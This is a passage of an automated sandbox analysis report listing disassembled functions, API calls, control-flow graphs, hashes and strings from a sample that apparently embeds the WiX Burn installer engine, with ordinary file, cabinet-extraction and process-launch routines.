                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                  • String ID: Failed to load Msi.DLL$Msi.dll$MsiBeginTransactionW$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEndTransaction$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\wiutil.cpp
                                                                                                                                                                  • API String ID: 190572456-4147843358
                                                                                                                                                                  • Opcode ID: c5d5b62394dc8c08087bedfe654e8e004a0cb3b1f95631d40f6a62856fbfa05b
                                                                                                                                                                  • Instruction ID: 8259f2e2b934ea95a64f22e1f0b71f76400a251b9d66e73da04c52114c5d683c
                                                                                                                                                                  • Opcode Fuzzy Hash: c5d5b62394dc8c08087bedfe654e8e004a0cb3b1f95631d40f6a62856fbfa05b
                                                                                                                                                                  • Instruction Fuzzy Hash: C241E47556B204EFEB10AF20ED1AB553BB5FF62749F004169E40E999B0E7B11980FBC0
                                                                                                                                                                  Function 0092CD75 Relevance: 35.3, APIs: 9, Strings: 11, Instructions: 258fileCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 792 92cd75-92cdc6 CreateFileW 793 92ce17-92ce25 call 9739dd 792->793 794 92cdc8-92cdd2 GetLastError 792->794 802 92ce27-92ce49 call 911228 793->802 803 92ce4e-92ce5a call 972b2e 793->803 796 92cdd4-92cddd 794->796 797 92cddf 794->797 796->797 798 92cde1 797->798 799 92cde6-92ce12 call 911225 call 911228 797->799 798->799 815 92d054-92d064 call 9567e6 799->815 811 92d04d-92d04e CloseHandle 802->811 809 92ce5f-92ce63 803->809 812 92ce65-92ce8a call 911228 809->812 813 92ce8f-92ce94 809->813 811->815 812->811 813->811 816 92ce9a-92cea9 SetFilePointerEx 813->816 819 92cef2-92cf02 call 973f70 816->819 820 92ceab-92ceb5 GetLastError 816->820 829 92cf04-92cf16 819->829 830 92cf1b-92cf2c SetFilePointerEx 819->830 822 92cec2 820->822 823 92ceb7-92cec0 820->823 825 92cec4 822->825 826 92cec9-92cee7 call 911225 822->826 823->822 825->826 838 92ceec-92ceed 826->838 831 92d040 829->831 832 92cf74-92cf84 call 973f70 830->832 833 92cf2e-92cf38 GetLastError 830->833 839 92d045-92d04a call 911228 831->839 846 92cf86-92cf98 832->846 847 92cf9d-92cfad call 973f70 832->847 835 92cf45 833->835 836 92cf3a-92cf43 833->836 840 92cf47 835->840 841 92cf4c-92cf6f call 911225 835->841 836->835 838->839 839->811 840->841 841->838 846->831 851 92cfc3-92cfd4 SetFilePointerEx 847->851 852 92cfaf-92cfc1 847->852 853 92cfd6-92cfe0 GetLastError 851->853 854 92d01c-92d02c call 973f70 851->854 852->831 855 92cfe2-92cfeb 853->855 856 92cfed 853->856 854->811 862 92d02e-92d03b 854->862 855->856 858 92cff4-92d012 call 911225 856->858 859 92cfef 856->859 858->854 859->858 862->831
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNELBASE(00000000,40000000,00000005,00000000,00000002,08000080,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 0092CDBB
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0092CDC8
                                                                                                                                                                    • Part of subcall function 00972B2E: ReadFile.KERNELBASE(?,?,00000000,?,00000000,?), ref: 00972BBF
                                                                                                                                                                  • SetFilePointerEx.KERNEL32(00000000,0097E818,00000000,00000000,00000000,?,00000000,0097E860,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0092CEA1
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0092CEAB
                                                                                                                                                                  • CloseHandle.KERNELBASE(00000000,?,00000000,0097E860,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0092D04E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$ErrorLast$CloseCreateHandlePointerRead
                                                                                                                                                                  • String ID: Failed to copy engine from: %ls to: %ls$Failed to create engine file at path: %ls$Failed to seek to beginning of engine file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$cabinet.dll$d:\a\wix4\wix4\src\burn\engine\cache.cpp$msi.dll
                                                                                                                                                                  • API String ID: 3456208997-2912061104
                                                                                                                                                                  • Opcode ID: 0d248d9831d148c7bd4a321483178e96a60b016e943c6cbad9b4cf7c0476f1a8
                                                                                                                                                                  • Instruction ID: f05c6f675545daa99d13d7b56231ca03fbf1c7befc8b70dc0fc8d6c57d87e686
                                                                                                                                                                  • Opcode Fuzzy Hash: 0d248d9831d148c7bd4a321483178e96a60b016e943c6cbad9b4cf7c0476f1a8
                                                                                                                                                                  • Instruction Fuzzy Hash: 537106B3B8173677E73166659C0AFBF696CAB88B50F064115BF04BA2D1E6A4DC0087F1
                                                                                                                                                                  Function 009183D7 Relevance: 33.6, APIs: 2, Strings: 20, Instructions: 593COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 864 9183d7-91841e EnterCriticalSection call 912680 867 918420-91842d 864->867 868 918444-918459 call 9129c8 864->868 869 918432-91843f call 911228 867->869 874 91845f-918471 868->874 875 91866e-91867c call 957b40 868->875 877 918a0e-918a1c LeaveCriticalSection 869->877 874->869 881 918473-918487 call 957b40 875->881 882 918682-91869f call 91b957 875->882 879 918a57-918a5c 877->879 880 918a1e-918a24 877->880 883 918a64-918a68 879->883 884 918a5e-918a5f call 97c1db 879->884 885 918a51-918a52 call 9155c9 880->885 886 918a26 880->886 910 9187bb-9187d8 call 91b957 881->910 911 91848d-918497 881->911 908 9187f1-9187f5 call 97c1fc 882->908 909 9186a5-9186b7 882->909 891 918a88-918a9b call 913886 * 3 883->891 892 918a6a-918a6e 883->892 884->883 885->879 893 918a28-918a2c 886->893 904 918aa0-918aa6 891->904 899 918a70-918a73 call 91367f 892->899 900 918a78-918a7c 892->900 894 918a3e-918a41 call 913886 893->894 895 918a2e-918a32 893->895 903 918a46-918a49 894->903 902 918a34-918a3c call 91367f 895->902 895->903 899->900 900->904 905 918a7e-918a86 call 91367f 900->905 902->903 903->893 916 918a4b-918a4e 903->916 905->904 924 9187fa-9187ff 908->924 910->908 929 9187da-9187e7 910->929 918 9184e5-9184e7 911->918 919 918499-9184bb call 91b957 911->919 916->885 925 918513-918534 call 91b99a 918->925 926 9184e9-91850a call 91b957 918->926 935 9184c1-9184e0 call 911228 919->935 936 918668-91866b 919->936 930 918801-918829 call 911225 924->930 931 918833-918840 call 97c20c 924->931 946 9187a4-9187b1 925->946 947 91853a-91854c 925->947 943 918510 926->943 944 9186bc-9186c9 926->944 929->908 930->931 949 918842 931->949 950 918885-91888c 931->950 954 918a0b 935->954 936->875 943->925 957 9186d3-9186fb call 911225 944->957 946->910 951 918563-91856f call 91540b 947->951 952 91854e-918556 call 9156c2 947->952 958 918844-918846 949->958 959 918848-91884b 949->959 955 9188b2-9188cd call 97c21c 950->955 956 91888e-918897 950->956 972 918772-91879f call 911225 951->972 973 918575-918579 951->973 952->957 969 91855c-918561 952->969 954->877 976 918947-91894b 955->976 977 9188cf-9188d1 955->977 965 918899-9188a8 call 97c20c 956->965 966 9188ac-9188b0 956->966 983 918700 957->983 962 918851-918856 958->962 959->962 970 918860-918872 call 911225 962->970 971 918858-91885d 962->971 991 9188d9 965->991 992 9188aa 965->992 966->955 966->956 969->973 997 918877-91887f 970->997 971->970 972->983 979 9185a1-9185b7 call 91b4f2 973->979 980 91857b-918582 973->980 985 918951-91896a call 91b938 976->985 986 9189ff-918a04 976->986 977->976 984 9188d3 977->984 1007 91874b-91876d call 911228 979->1007 1008 9185bd-9185c5 979->1008 980->979 988 918584-91859f call 91b99a 980->988 993 918706-918713 983->993 994 918913-918916 984->994 995 9188d5-9188d7 984->995 1010 918983-91899a call 97c21c 985->1010 1011 91896c-918979 985->1011 986->954 1001 918a06-918a09 986->1001 1015 91861f-918621 988->1015 998 9188db-9188dd 991->998 999 9188df-9188e2 991->999 992->966 1009 91871d-91872a 993->1009 1003 91891c-918921 994->1003 995->1003 997->950 1005 9188e8-9188ed 998->1005 999->1005 1001->954 1018 918923-918928 1003->1018 1019 91892b-918942 call 911225 1003->1019 1013 9188f7-91890e call 911225 1005->1013 1014 9188ef-9188f4 1005->1014 1007->954 1016 9185c7 1008->1016 1017 9185c9-9185cd 1008->1017 1026 918734-918741 1009->1026 1036 9189d2-9189e6 call 91b99a 1010->1036 1037 91899c 1010->1037 1011->1010 1013->997 1014->1013 1015->1026 1027 918627-918645 call 91b979 1015->1027 1016->1017 1020 9185e9-918607 call 918b6f 1017->1020 1021 9185cf-9185d1 1017->1021 1018->1019 1019->997 1041 918609-918612 call 913089 1020->1041 1042 91861c 1020->1042 1021->1020 1028 9185d3-9185e7 call 912eaf 1021->1028 1026->1007 1027->1009 1045 91864b-918662 call 91b957 1027->1045 1047 918617-918619 1028->1047 1036->986 1054 9189e8-9189f5 1036->1054 1043 9189ac 1037->1043 1044 91899e-9189aa 1037->1044 1041->1047 1042->1015 1050 9189b6-9189c8 call 911225 1043->1050 1051 9189ae-9189b3 1043->1051 1044->1043 1045->936 1045->993 1047->1042 1050->1036 1051->1050 1054->986
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,?,0092A80F,?,?,00000001,00000000,00000008,?,00000000,00000000,?,?), ref: 009183FF
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000000,00000000,?,0097E908,00000000,00000000,00000000,00000008,00000000,00000000,00000008,?,00000000,00000008,?,?), ref: 00918A11
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to length of format string.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 3168844106-2252141963
                                                                                                                                                                  • Opcode ID: 07a3185985e3683ee08ec61b84be65e6b0604fb39684062e80be4533f320c377
                                                                                                                                                                  • Instruction ID: f3929ef46a640e4403875c4a91146008e3b83564bd3b11508bd530f109e3a843
                                                                                                                                                                  • Opcode Fuzzy Hash: 07a3185985e3683ee08ec61b84be65e6b0604fb39684062e80be4533f320c377
                                                                                                                                                                  • Instruction Fuzzy Hash: B912C671F4121DBBDB11DF948C45FEF7AB8EB44B50F11415ABA01FB280DA749E81ABA0
                                                                                                                                                                  Function 009174EE Relevance: 30.0, APIs: 6, Strings: 11, Instructions: 208windowCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 1112 9174ee-917544 call 92a5be 1115 917546-917553 1112->1115 1116 91756a-917579 call 914456 1112->1116 1117 917558-917565 call 911228 1115->1117 1122 91757b-91758d 1116->1122 1123 91758f-91759d call 92e49c 1116->1123 1124 9176b8-9176c3 IsWindow 1117->1124 1122->1117 1131 9175a6-9175af call 92e4a9 1123->1131 1132 91759f-9175a4 1123->1132 1126 9176c5-9176ce PostMessageW 1124->1126 1127 9176d4-9176d8 1124->1127 1126->1127 1129 9176e7-9176ed 1127->1129 1130 9176da-9176e3 CloseHandle 1127->1130 1133 9176fb-9176fe 1129->1133 1134 9176ef-9176f8 CloseHandle 1129->1134 1130->1129 1137 9175b4-9175b8 1131->1137 1136 9175d4-9175ec call 93347d 1132->1136 1138 917700-917709 CloseHandle 1133->1138 1139 91770c-91770e 1133->1139 1134->1133 1147 917612-91762b call 912b11 1136->1147 1148 9175ee-9175fb 1136->1148 1141 9175ba-9175cc 1137->1141 1142 9175ce-9175d1 1137->1142 1138->1139 1143 917710-917711 CloseHandle 1139->1143 1144 917717-91772b call 913886 * 2 1139->1144 1141->1117 1142->1136 1143->1144 1160 917735-917739 1144->1160 1161 91772d-917730 call 91367f 1144->1161 1157 917641-91765d call 9337dc 1147->1157 1158 91762d-91763f 1147->1158 1150 917600-91760d call 911228 1148->1150 1162 9176b5 1150->1162 1167 917676-91768a call 96bf20 1157->1167 1168 91765f-917674 1157->1168 1158->1150 1165 917743-917749 1160->1165 1166 91773b-91773e call 91367f 1160->1166 1161->1160 1162->1124 1166->1165 1172 91768f-917693 1167->1172 1170 9176a8-9176b2 call 911228 1168->1170 1170->1162 1172->1162 1174 917695-9176a3 1172->1174 1174->1170
                                                                                                                                                                  APIs
                                                                                                                                                                  • IsWindow.USER32(0097E7C0), ref: 009176BB
                                                                                                                                                                  • PostMessageW.USER32(0097E7C0,00000010,00000000,00000000), ref: 009176CE
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009176DD
                                                                                                                                                                  • CloseHandle.KERNEL32(00917EA1), ref: 009176F2
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00917703
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00917711
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 00917558, 00917600, 009176A8
                                                                                                                                                                  • Failed to wait for clean room process: %ls, xrefs: 00917696
                                                                                                                                                                  • msasn1.dll, xrefs: 0091752C
                                                                                                                                                                  • version.dll, xrefs: 00917649
                                                                                                                                                                  • Failed to create clean room command-line., xrefs: 009175EE
                                                                                                                                                                  • Failed to open clean room log., xrefs: 00917546
                                                                                                                                                                  • Failed to get path for current process., xrefs: 0091757B
                                                                                                                                                                  • Failed to cache to clean room., xrefs: 009175BA
                                                                                                                                                                  • "%ls" %ls, xrefs: 00917619
                                                                                                                                                                  • Failed to launch clean room process: %ls, xrefs: 00917662
                                                                                                                                                                  • Failed to allocate full command-line., xrefs: 0091762D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$MessagePostWindow
                                                                                                                                                                  • String ID: "%ls" %ls$Failed to allocate full command-line.$Failed to cache to clean room.$Failed to create clean room command-line.$Failed to get path for current process.$Failed to launch clean room process: %ls$Failed to open clean room log.$Failed to wait for clean room process: %ls$d:\a\wix4\wix4\src\burn\engine\engine.cpp$msasn1.dll$version.dll
                                                                                                                                                                  • API String ID: 2982985107-3522039553
                                                                                                                                                                  • Opcode ID: de6a23869c9524b1e73529824d7c1e2e5d55d58ebefd09b08f44ca8649fd281d
                                                                                                                                                                  • Instruction ID: 39945ec77e44f5548c04f292b3cd6b66de696638132725ca21962f1e8f866457
                                                                                                                                                                  • Opcode Fuzzy Hash: de6a23869c9524b1e73529824d7c1e2e5d55d58ebefd09b08f44ca8649fd281d
                                                                                                                                                                  • Instruction Fuzzy Hash: DA61B672F4461EBBDB129BE4CC46FEEBB78AF48754F100115F614B62D0D7B09A808BA5
                                                                                                                                                                  Function 0096A58B Relevance: 28.1, APIs: 6, Strings: 10, Instructions: 99libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 1176 96a58b-96a5a0 call 911839 1179 96a5a2-96a5ce GetProcAddress * 2 1176->1179 1180 96a5d0 1176->1180 1181 96a5d5-96a5dc 1179->1181 1180->1181 1182 96a5e6-96a5f9 call 911839 1181->1182 1183 96a5de-96a5e0 1181->1183 1188 96a5fb-96a607 1182->1188 1189 96a619-96a636 GetProcAddress 1182->1189 1183->1182 1184 96a6d4 1183->1184 1187 96a6de-96a6e2 1184->1187 1190 96a60c-96a614 call 911228 1188->1190 1191 96a677-96a694 GetProcAddress 1189->1191 1192 96a638-96a63a 1189->1192 1190->1187 1191->1184 1193 96a696-96a698 1191->1193 1192->1191 1195 96a63c-96a646 GetLastError 1192->1195 1193->1184 1196 96a69a-96a6a4 GetLastError 1193->1196 1198 96a653 1195->1198 1199 96a648-96a651 1195->1199 1200 96a6a6-96a6af 1196->1200 1201 96a6b1 1196->1201 1202 96a655 1198->1202 1203 96a65a-96a672 call 911225 1198->1203 1199->1198 1200->1201 1205 96a6b3 1201->1205 1206 96a6b8-96a6d2 call 911225 1201->1206 1202->1203 1209 96a674-96a675 1203->1209 1205->1206 1206->1209 1209->1190
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00911839: LoadLibraryExW.KERNEL32(?,00000000,00000800,00000000,?,00911645,?,?,?,?,?,?,0091115A,cabinet.dll,00000009,?), ref: 00911855
                                                                                                                                                                    • Part of subcall function 00911839: GetLastError.KERNEL32(?,00911645,?,?,?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 00911866
                                                                                                                                                                  • GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 0096A5AD
                                                                                                                                                                  • GetProcAddress.KERNEL32(SystemFunction041), ref: 0096A5C3
                                                                                                                                                                  • GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 0096A624
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0096A63C
                                                                                                                                                                  • GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 0096A682
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0096A69A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$ErrorLast$LibraryLoad
                                                                                                                                                                  • String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$Failed to load Crypt32.dll$Failed to load a decryption method$Failed to load an encryption method$SystemFunction040$SystemFunction041$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\cryputil.cpp
                                                                                                                                                                  • API String ID: 1969025732-402918305
                                                                                                                                                                  • Opcode ID: e3ea9dc7f74513c25c124a2c5e0e7e3114f3b33f898dbd4a5c3fe7f28d317a29
                                                                                                                                                                  • Instruction ID: 80f95ebecf30492919ea30ad05c8986680c7933ff98791f38f4417cdb78f1769
                                                                                                                                                                  • Opcode Fuzzy Hash: e3ea9dc7f74513c25c124a2c5e0e7e3114f3b33f898dbd4a5c3fe7f28d317a29
                                                                                                                                                                  • Instruction Fuzzy Hash: 00312B32A9A321B7D33117149C0EB5639D8AB5AB98F054111F90ABA5F1F7B49C40EFE1
                                                                                                                                                                  Function 0093E800 Relevance: 26.5, APIs: 6, Strings: 9, Instructions: 232COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 1211 93e800-93e82f CoInitializeEx 1212 93e831-93e850 call 911228 1211->1212 1213 93e855-93e8a3 call 97c175 1211->1213 1218 93ead3-93eae3 call 9567e6 1212->1218 1219 93e8a5-93e8d8 call 911225 call 911228 1213->1219 1220 93e8dd-93e8ff call 97c196 1213->1220 1235 93eacd CoUninitialize 1219->1235 1227 93e905-93e90d 1220->1227 1228 93e9ca-93e9d5 SetEvent 1220->1228 1230 93e913-93e919 1227->1230 1231 93eac4-93eacc call 97c1a6 1227->1231 1232 93ea20-93ea2e call 91174a 1228->1232 1233 93e9d7-93e9e1 GetLastError 1228->1233 1230->1231 1236 93e91f-93e927 1230->1236 1231->1235 1251 93ea30-93ea47 1232->1251 1252 93ea49-93ea54 ResetEvent 1232->1252 1239 93e9e3-93e9ec 1233->1239 1240 93e9ee 1233->1240 1235->1218 1243 93e9a1-93e9c5 call 911228 1236->1243 1244 93e929-93e92b 1236->1244 1239->1240 1241 93e9f2-93ea04 call 911225 1240->1241 1242 93e9f0 1240->1242 1262 93ea09-93ea12 1241->1262 1242->1241 1243->1231 1248 93e93e-93e941 1244->1248 1249 93e92d 1244->1249 1256 93e943 1248->1256 1257 93e99b 1248->1257 1254 93e933-93e93c 1249->1254 1255 93e92f-93e931 1249->1255 1259 93ea13-93ea1b call 911228 1251->1259 1260 93ea56-93ea60 GetLastError 1252->1260 1261 93ea8d-93ea93 1252->1261 1266 93e99d-93e99f 1254->1266 1255->1266 1267 93e982-93e987 1256->1267 1268 93e951-93e956 1256->1268 1269 93e990-93e995 1256->1269 1270 93e997-93e999 1256->1270 1271 93e966-93e96b 1256->1271 1272 93e974-93e979 1256->1272 1273 93e97b-93e980 1256->1273 1274 93e94a-93e94f 1256->1274 1275 93e989-93e98e 1256->1275 1276 93e958-93e95d 1256->1276 1277 93e95f-93e964 1256->1277 1278 93e96d-93e972 1256->1278 1257->1266 1259->1231 1279 93ea62-93ea6b 1260->1279 1280 93ea6d 1260->1280 1263 93ea95-93ea98 1261->1263 1264 93eabf 1261->1264 1262->1259 1283 93eabb-93eabd 1263->1283 1284 93ea9a-93eab6 call 911225 1263->1284 1264->1231 1266->1228 1266->1243 1267->1243 1268->1243 1269->1243 1270->1243 1271->1243 1272->1243 1273->1243 1274->1243 1275->1243 1276->1243 1277->1243 1278->1243 1279->1280 1281 93ea71-93ea88 call 911225 1280->1281 1282 93ea6f 1280->1282 1281->1262 1282->1281 1283->1231 1284->1262
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000), ref: 0093E825
                                                                                                                                                                  • CoUninitialize.COMBASE ref: 0093EACD
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeUninitialize
                                                                                                                                                                  • String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
                                                                                                                                                                  • API String ID: 3442037557-242603754
                                                                                                                                                                  • Opcode ID: 80bf4dc3dda0fbaa0f262b38c9e4714fbc1690f3637b9b332bd89f5cc892b00a
                                                                                                                                                                  • Instruction ID: 833fdf477d33a5afa51bb4468fc31f27a19c1326a40b6a949fb152281a44348e
                                                                                                                                                                  • Opcode Fuzzy Hash: 80bf4dc3dda0fbaa0f262b38c9e4714fbc1690f3637b9b332bd89f5cc892b00a
                                                                                                                                                                  • Instruction Fuzzy Hash: 5261877BE98226B7EB2096588C46FBB615CABC4B20F260625FD01FF3C0D1689C405FD6
                                                                                                                                                                  Function 0091EBDB Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 146fileCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
